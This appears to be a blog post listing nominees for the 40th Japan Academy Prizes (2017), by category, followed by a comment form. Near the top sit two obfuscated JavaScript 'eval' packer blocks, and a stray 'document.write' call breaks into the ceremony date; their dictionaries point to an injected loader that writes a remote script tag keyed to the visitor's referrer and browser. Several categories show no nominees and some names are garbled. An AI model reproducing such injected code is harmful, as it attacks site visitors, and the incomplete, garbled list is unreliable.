40th Japan Academy Awards (2017) nominees


eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ydina|var|u0026u|referrer|aenfd||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ysikb|var|u0026u|referrer|tryhb||js|php’.split(‘|’),0,{}))

The nominees for the 40th Annual Japan Academy Prizes (?40?????????) were announced on January 15th. The winners in each category will be revealed by the Japan Academy Prize Associations at a ceremony held at the Grand Prince Hotel New Takanawa in Tokyo on March 3, document.write(“”); 2017.

Here is the list of all the nominees (after the jump):

Best Picture of the Year

Best Animation

Best Director

Best Screenplay

  • Makoto Shinkai (Your Name)
  • Ryota Nakano (Her Love Boils Bathwater)
  • Shinichi Hisamatsu and Takahisa Zeze (64: Part I)
  • Yoji Yamada and Emiko Hiramatsu (What a Wonderful Family!)
  • Lee Sang-il (Rage)

Best Actor

Best Actress

Best Supporting Actor

  • Takehara Pistol (The Long Excuse)
  • Satoshi Tsumabuki (Rage)
  • Masahiro Higashide (Satoshi: A Move for Tomorrow)
  • Mirai Moriyama (Rage)
  • Lily Franky (Scoop!)

Best Supporting Actress

  • Satomi Ishihara (Shin Godzilla)
  • Mikako Ichikawa (Shin Godzilla)
  • Hana Sugisaki (Her Love Boils Bathwater)
  • Suzu Hirose (Rage)
  • Aoi Miyazaki (Birthday Card)

Best Cinematography

  • Norimichi Kasamatsu (Rage)
  • K?ichi Sait? (64: Part I)
  • Kozo Shibasaki (A Man Called Pirate)
  • Masashi Chikamori (The Magnificent Nine)
  • Kousuke Yamada (Shin Godzilla)

Best Lighting Direction

  • Yuuki Nakamura (Rage)
  • Akinaga Tomiyama (64: Part I)
  • Nariyuki Ueda (A Man Called Pirate)
  • Koichi Watanabe (What a Wonderful Family!)
  • Takayuki Kawabe (Shin Godzilla)

Best Music (Composer)

  • Kotringo (In This Corner of the World)
  • Shirou Sagisu (Shin Godzilla)
  • Naoki Sato (A Man Called Pirate)
  • Muramatsu Takatsugu (64: Part I)
  • Radwimps (Your Name)

Best Art Direction

  • Toshihiro Isomi (64: Part I)
  • Tomoko Kurata (What a Wonderful Family!)
  • Yuji Tsuzuki and Fumiko Sakahara (Rage)
  • Takayuki Nitta (The Magnificent Nine)
  • Yuji Hayashida and Eri Sakushima (Shin Godzilla)

Best Sound Recording

  • Kazumi Kishida (What a Wonderful Family!)
  • Mitsugu Shiratori (Rage)
  • Shinya Takada (64: Part I)
  • Jun Nakamura and Haru Yamada (Shin Godzilla)
  • Kenichi Fujimoto (A Man Called Pirate)

Best Film Editing

  • Hideaki Anno and Atsuki Sato (Shin Godzilla)
  • Iwao Ishii (What a Wonderful Family!)
  • Tsuyoshi Imai (Rage)
  • Ryo Hayano (64: Part I)
  • Ryuji Miyajima (A Man Called Pirate)

Best Foreign Language Film

Newcomers of the year

Sources: ANN, Asahi Shinbum, Google, Psycho-drama, Wikipedia.

You can also read our entries for the winners of 2016, 2015, 2014 and 2013.

[ Traduire ]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s